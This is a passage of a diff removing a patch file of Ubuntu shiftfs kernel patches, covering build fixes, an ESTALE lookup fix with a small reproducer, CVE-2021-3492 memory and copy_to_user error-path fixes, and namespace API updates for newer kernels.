- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
-
-It seems that shiftfs was getting linux/fiemap.h included
-indirectly before. Include it directly.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5d88193b41db..f9a5c94a9793 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -20,6 +20,7 @@
- #include <linux/posix_acl.h>
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
-+#include <linux/fiemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Tue, 23 Jun 2020 19:46:16 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
- lookups
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872757
-
-Users reported that creating temporary files shiftfs reports ESTALE.
-This can be reproduced via:
-
-import tempfile
-import os
-
-def test():
-    with tempfile.TemporaryFile() as fd:
-        fd.write("data".encode('utf-8'))
-        # re-open the file to get a read-only file descriptor
-        return open(f"/proc/self/fd/{fd.fileno()}", "r")
-
-def main():
-   fd = test()
-   fd.close()
-
-if __name__ == "__main__":
-    main()
-
-a similar issue was reported here:
-https://github.com/systemd/systemd/issues/14861
-
-Our revalidate methods were very opinionated about whether or not a
-lower dentry was valid especially when it became unlinked we simply
-invalidated the lower dentry which caused above bug to surface. This has
-led to bugs where a ESTALE was returned for e.g.  temporary files that
-were created and directly re-opened afterwards through
-/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
-/proc/<pid>/fd/<nr> LOOKUP_JUMP is set and the vfs will revalidate via
-d_weak_revalidate(). Since the file has been unhashed or even already
-gone negative we'd fail the open when we should've succeeded.
-
-Reported-by: Christian Kellner <ckellner@redhat.com>
-Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Link: https://github.com/systemd/systemd/issues/14861
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f9a5c94a9793..3cfd1881e9a2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
-@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
--- 
-2.39.2
-
-From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 30 Dec 2020 11:10:20 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
-Cc: mpagano@gentoo.org
-
-After commit:
-
- 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
-
-__close_fd() has been renamed to close_fd() and the files parameter has
-been removed.
-
-Change the shiftfs code to properly support this change.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3cfd1881e9a2..4f1d94903557 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	__close_fd(current->files, fd);
-+	close_fd(fd);
- 	kfree(v1);
- 	kfree(v2);
- 
-@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	/*
- 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
- 	 * take a reference here to offset the one which will be put by
--	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 * close_fd(), and make sure that reference is put on fdput(lfd).
- 	 */
- 	get_file(lfd.file);
- 	lfd.flags |= FDPUT_FPUT;
--- 
-2.39.2
-
-From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:01:06 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
- shiftfs_btrfs_ioctl_fd_replace() error paths
-Cc: mpagano@gentoo.org
-
-Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
-allocated near the top of the function. Fix up these error paths to free
-the memory.
-
-Additionally, the addresses for the allocated memory are assigned to
-return parameters early in the function, before we know whether or not
-the function as a whole will return success. Wait to assign these values
-until we know the function was successful, and for good measure
-initialize the return parameters to NULL at the start.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 28 +++++++++++++++++++++-------
- 1 file changed, 21 insertions(+), 7 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4f1d94903557..8eab93691d62 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-+	*b1 = NULL;
-+	*b2 = NULL;
-+
- 	if (!is_btrfs_snap_ioctl(cmd))
- 		return 0;
- 
-@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		if (IS_ERR(v1))
- 			return PTR_ERR(v1);
- 		oldfd = v1->fd;
--		*b1 = v1;
- 	} else {
- 		v2 = memdup_user(arg, sizeof(*v2));
- 		if (IS_ERR(v2))
- 			return PTR_ERR(v2);
- 		oldfd = v2->fd;
--		*b2 = v2;
- 	}
- 
- 	src = fdget(oldfd);
--	if (!src.file)
--		return -EINVAL;
-+	if (!src.file) {
-+		ret = -EINVAL;
-+		goto err_free;
-+	}
- 
- 	ret = shiftfs_real_fdget(src.file, &lfd);
- 	if (ret) {
- 		fdput(src);
--		return ret;
-+		goto err_free;
- 	}
- 
- 	/*
-@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
- 		fdput(lfd);
--		return *newfd;
-+		ret = *newfd;
-+		goto err_free;
- 	}
- 
- 	fd_install(*newfd, lfd.file);
-@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		v2->fd = oldfd;
- 	}
- 
--	if (ret)
-+	if (!ret) {
-+		*b1 = v1;
-+		*b2 = v2;
-+	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+	}
-+
-+	return ret;
-+
-+err_free:
-+	kfree(v1);
-+	kfree(v2);
- 
- 	return ret;
- }
--- 
-2.39.2
-
-From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:10:37 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
- correctly
-Cc: mpagano@gentoo.org
-
-shiftfs expects copy_to_user() to return a negative error code on
-failure, when it actually returns the amount of uncopied data. Fix all
-code using copy_to_user() to handle the return values correctly.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8eab93691d62..abeb7db3b9be 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	kfree(v1);
- 	kfree(v2);
- 
--	return ret;
-+	return ret ? -EFAULT: 0;
- }
- 
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		*b2 = v2;
- 	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+		ret = -EFAULT;
- 	}
- 
- 	return ret;
--- 
-2.39.2
-
-From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Mon, 9 Aug 2021 17:15:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1939301
-
-Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
-caused a regression for us. It states:
-
-> default_file_splice_write is the last piece of generic code that uses
-> set_fs to make the uaccess routines operate on kernel pointers.  It
-> implements a "fallback loop" for splicing from files that do not actually
-> provide a proper splice_read method.  The usual file systems and other
-> high bandwidth instances all provide a ->splice_read, so this just removes
-> support for various device drivers and procfs/debugfs files.  If splice
-> support for any of those turns out to be important it can be added back
-> by switching them to the iter ops and using generic_file_splice_read.
-
-this means that currently all workloads making use of sendfile() on
-shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
-by providing explicit .splice_read() and .splice_write() methods which
-jus restores the status quo and we keep using a generic method provided
-by the vfs.
-
-Cc: Seth Forshee <sforshee@kernel.org>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index abeb7db3b9be..f5f6d8d8144e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.copy_file_range	= shiftfs_copy_file_range,
- 	.remap_file_range	= shiftfs_remap_file_range,
-+	.splice_read		= generic_file_splice_read,
-+	.splice_write		= iter_file_splice_write,
- };
- 
- const struct file_operations shiftfs_dir_operations = {
--- 
-2.39.2
-
-From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Thu, 20 Jan 2022 16:55:24 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
-Cc: mpagano@gentoo.org
-
-WARNING: after this change we may see some regressions if shiftfs is
-used with filesystem namespaces.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
- 1 file changed, 64 insertions(+), 43 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f5f6d8d8144e..76c54bc12018 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct user_namespace *ns,
-+			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_getxattr(lowerd, name, value, size);
-+	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 	return err;
- }
- 
--static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+static int shiftfs_removexattr(struct user_namespace *ns,
-+			       struct dentry *dentry, const char *name)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(lowerd, name);
-+	err = vfs_removexattr(ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- }
- 
- static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct user_namespace *ns,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, const void *value, size_t size,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(dentry, name);
--	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(ns, dentry, name);
-+	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct user_namespace *ns,
-+				 struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(inode, diri, mode);
-+		inode_init_owner(ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 	return err;
- }
- 
--static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_create(struct user_namespace *ns,
-+			  struct inode *dir, struct dentry *dentry,
- 			  umode_t mode,  bool excl)
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
- }
- 
--static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			 umode_t mode)
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
- }
- 
--static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+static int shiftfs_mknod(struct user_namespace *ns,
-+			 struct inode *dir, struct dentry *dentry, umode_t mode,
- 			 dev_t rdev)
- {
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
--static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(loweri, lowerd);
-+		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
- 	else
--		err = vfs_unlink(loweri, lowerd, NULL);
-+		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
- 	revert_creds(oldcred);
- 
- 	if (!err) {
-@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
- 	return shiftfs_rm(dir, dentry, true);
- }
- 
--static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+static int shiftfs_rename(struct user_namespace *ns,
-+			  struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
-@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		      *trapd;
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
-+	struct renamedata rd = {
-+		.old_mnt_userns	= ns,
-+		.old_dir	= loweri_dir_old,
-+		.old_dentry	= lowerd_old,
-+		.new_mnt_userns	= ns,
-+		.new_dir	= loweri_dir_new,
-+		.new_dentry	= lowerd_new,
-+	};
- 	int err = -EINVAL;
- 	const struct cred *oldcred;
- 
-@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		goto out_unlock;
- 
- 	oldcred = shiftfs_override_creds(old->d_sb);
--	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
--			 NULL, flags);
-+	err = vfs_rename(&rd);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(loweri_dir_old, olddir);
-@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 	return d_splice_alias(inode, dentry);
- }
- 
--static int shiftfs_permission(struct inode *inode, int mask)
-+static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
- {
- 	int err;
- 	const struct cred *oldcred;
-@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(inode, mask);
-+	err = generic_permission(ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(loweri, mask);
-+	err = inode_permission(ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
- 	return err;
- }
- 
--static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_tmpfile(struct user_namespace *ns,
-+			   struct inode *dir, struct dentry *dentry,
- 			   umode_t mode)
- {
- 	int err;
-@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
- }
- 
--static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
-@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(dentry, attr);
-+	err = setattr_prepare(ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, &newattr, NULL);
-+	err = notify_change(ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	return err;
- }
- 
--static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+static int shiftfs_getattr(struct user_namespace *ns,
-+			   const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
-@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
- 			break;
- 		case ACL_GROUP:
--			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
- 			kgid = shift_kgid(from, to, kgid);
--			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
- 			break;
- 		default:
- 			break;
-@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 	}
- }
- 
--static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
-+static struct posix_acl *
-+shiftfs_get_acl(struct inode *inode, int type, bool rcu)
- {
- 	struct inode *loweri = inode->i_private;
- 	const struct cred *oldcred;
-@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- 	int size;
- 	int err;
- 
-+	if (rcu)
-+		return ERR_PTR(-ECHILD);
-+
- 	if (!IS_POSIXACL(loweri))
- 		return NULL;
- 
-@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
- 
- static int
- shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct user_namespace *ns,
- 			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
-@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(inode))
-+	if (!inode_owner_or_capable(ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(dentry, handler->name);
-+		err = shiftfs_removexattr(ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 13 Apr 2022 15:26:22 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
-Cc: mpagano@gentoo.org
-
-With the porting of shiftfs from 5.15 to 5.17 some filesystem-related
-functions are now passing struct user_namespace as argument, however
-shiftfs logic is still relying on the fact that these functions need to
-use the main filesystem namespace.
-
-Make sure to always use init_user_ns to prevent breakage of system
-components that rely on shiftfs.
-
-Without this fix lxd was showing some issues, like failing to create any
-file inside a container when shiftfs was used (e.g., using zfs as
-storage pool).
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
- 1 file changed, 24 insertions(+), 26 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 76c54bc12018..a21624c529f0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct user_namespace *ns,
--			    struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
-+	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(ns, lowerd, name);
-+	err = vfs_removexattr(&init_user_ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(ns, dentry, name);
--	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(&init_user_ns, dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct user_namespace *ns,
--				 struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(ns, inode, diri, mode);
-+		inode_init_owner(&init_user_ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
